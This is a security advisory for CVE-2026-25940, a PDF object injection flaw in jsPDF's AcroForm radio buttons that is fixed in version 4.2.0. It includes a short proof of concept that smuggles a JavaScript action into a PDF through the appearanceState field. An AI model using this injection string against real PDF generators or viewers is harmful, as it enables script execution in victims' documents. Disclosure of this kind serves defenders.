CVE-2026-25940
HIGH8.1EPSS 0.04%jsPDF has a PDF Injection in AcroForm module allows Arbitrary JavaScript Execution (RadioButton.createOption and "AS" property)
Description
### Impact User control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions. If given the possibility to pass unsanitized input to the following property, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim hovers over the radio option. * `AcroformChildClass.appearanceState` Example attack vector: ```js import { jsPDF } from "jspdf" const doc = new jsPDF(); const group = new doc.AcroFormRadioButton(); group.x = 10; group.y = 10; group.width = 20; group.height = 10; doc.addField(group); const child = group.createOption("opt1"); child.x = 10; child.y = 10; child.width = 20; child.height = 10; child.appearanceState = "Off /AA << /E << /S /JavaScript /JS (app.alert('XSS')) >> >>"; doc.save("test.pdf"); ``` ### Patches The vulnerability has been fixed in [email protected]. ### Workarounds Sanitize user input before passing it to the vulnerable API members.
Affected packages (1)
- npm/jspdffrom 0, < 4.2.0
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH8.1 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N |
References (5)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2026-25940
- PATCHhttps://github.com/parallax/jsPDF
- WEBhttps://github.com/parallax/jsPDF/commit/71ad2dbfa6c7c189ab42b855b782620fa8a38375
- WEBhttps://github.com/parallax/jsPDF/releases/tag/v4.2.0
- WEBhttps://github.com/parallax/jsPDF/security/advisories/GHSA-p5xg-68wr-hm3m